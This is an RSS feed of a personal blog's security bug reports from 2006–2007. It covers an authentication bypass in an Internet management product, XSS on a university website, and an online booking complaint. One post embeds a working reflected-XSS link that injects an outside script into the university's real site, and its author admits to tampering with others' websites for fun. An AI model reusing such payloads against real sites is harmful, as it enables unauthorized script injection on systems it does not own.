<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rss [<!ENTITY % HTMLlat1 PUBLIC "-//W3C//ENTITIES Latin 1 for XHTML//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent">]>
<rss version="2.0" xml:base="http://www.ajaypal.com">
<channel>
 <title>ajaypal.com - Bug Reports</title>
 <link>http://www.ajaypal.com/taxonomy/term/18/0</link>
 <description></description>
 <language>en</language>
<item>
 <title>Authentication bypass in Cyberix Internet Management System</title>
 <link>http://www.ajaypal.com/cyberix_auth_bypass.html</link>
 <description>&lt;p&gt;A mohali based company http://www.cyberix.in/ has an otherwise good Internet Management Software Product by the  name Cyberix, is vulnerable to a very simple authentication bypass vulnerability (rather it is more of a software design issue).&lt;/p&gt;
&lt;p&gt;Cyberix IMS when authenticating a user using, the web login via a popup window, sends the MD5 hash of the users password in the GET request. As all URLs, along with the GET variables and their values, are saved in the browser&#039;s history, thus any user  who has access to the system, used by a previous user, can simply check the browser history and click on the login URL to login as the other user, without providing any password. Defeating the purpose of an IMS where different users may have different access levels as promised by Cyberix IMS.&lt;/p&gt;
</description>
 <category domain="http://www.ajaypal.com/taxonomy/term/18">Bug Reports</category>
 <category domain="http://www.ajaypal.com/taxonomy/term/11">Security</category>
 <pubDate>Mon, 19 Mar 2007 02:40:01 -0700</pubDate>
</item>
<item>
 <title>Daddy Says Puttar No XSS</title>
 <link>http://www.ajaypal.com/say_no_to_xss.html</link>
 <description>&lt;p&gt;These days I am having too much fun with &lt;a href=&#039;http://en.wikipedia.org/wiki/Xss&#039;&gt;XSS&lt;/a&gt;. It is no good &lt;a href=&#039;http://www.ptu.ac.in/ptu_upload/ptuadmin/index.asp?err=%3Cscript%20%20src=http://ajaypal.com/holix.js%3E%3C/script%3E&#039;&gt;wishing happy holi&lt;/a&gt; by manipulating other peoples websites, even though it is harmless. You never know when you will come across some crazy hippocrat who believes that its website has been defaced and then tries to grab the poor fun loving XSSer by neck.&lt;/p&gt;
&lt;p&gt;&lt;b &gt;Note to Self&lt;/b&gt;&lt;br /&gt;
Keep out of trouble and stop XSSing even if the other guy does not fix the website. Hey did I mention it is possible to move Lambi Assembly Constituency in Punjab to Haryana, now don&#039;t ask me how. A number of other funny permutations are also possible. Guess what am I talking about, or wait till &lt;a href=&#039;http://www.cert-in.org.in/&#039;&gt;these people&lt;/a&gt; say something...&lt;/p&gt;
</description>
 <category domain="http://www.ajaypal.com/taxonomy/term/18">Bug Reports</category>
 <category domain="http://www.ajaypal.com/taxonomy/term/6">Humor</category>
 <category domain="http://www.ajaypal.com/taxonomy/term/11">Security</category>
 <pubDate>Sat, 03 Mar 2007 15:49:47 -0700</pubDate>
</item>
<item>
 <title>Online Ticket Booking vs Fun with Mozilla Firefox</title>
 <link>http://www.ajaypal.com/online_ticket_booking_is_fun.html</link>
 <description>&lt;p&gt;The fun of online ticket booking. No going to agents and listening to their non-sense, no asking questions, just sit in front of your dear computer fire the browser, select Destination, make payment using the Credit Card and lo and behold you have the tickets.&lt;/p&gt;
&lt;p&gt;Well not that simple, specially when you are using a computer based on &lt;A href=&#039;http://www.gnu.org&#039;&gt;free software&lt;/a&gt; (free as in freedom). I use GNU/ Linux, Mozilla Firefox, I dont trust Windows for online transactions [&lt;a href=&#039;online_ticket_booking_is_fun.html#WHATIF&#039;&gt;*&lt;/a&gt;].&lt;/p&gt;
</description>
 <category domain="http://www.ajaypal.com/taxonomy/term/18">Bug Reports</category>
 <category domain="http://www.ajaypal.com/taxonomy/term/16">Exposed</category>
 <enclosure url="http://www.ajaypal.com/files/tavelguru.jpg" length="9105" type="image/jpeg" />
 <pubDate>Fri, 15 Sep 2006 10:52:43 -0700</pubDate>
</item>
<item>
 <title>PTU Jalandhar Website XSS Vulnerability</title>
 <link>http://www.ajaypal.com/ptu_xss.html</link>
 <description>&lt;p&gt;These days &lt;a href=&#039;http://lists.grok.org.uk/full-disclosure-charter.html&#039;&gt;Full Disclosure mailing list&lt;/a&gt; is being dominated by &lt;a href=&#039;http://en.wikipedia.org/wiki/XSS&#039;&gt;XSS vulnerabilities&lt;/a&gt;. It is time I should put up my contribution too, for an XSS vulnerability I have known for around 7-8 months.&lt;br /&gt;
The site in question ptu.ac.in is of Punjab Technical University, Jalandhar. The URL http://ptujal.org used to refers to the same site.&lt;/p&gt;
</description>
 <category domain="http://www.ajaypal.com/taxonomy/term/18">Bug Reports</category>
 <category domain="http://www.ajaypal.com/taxonomy/term/16">Exposed</category>
 <category domain="http://www.ajaypal.com/taxonomy/term/11">Security</category>
 <pubDate>Sun, 28 May 2006 22:01:51 -0700</pubDate>
</item>
</channel>
</rss>
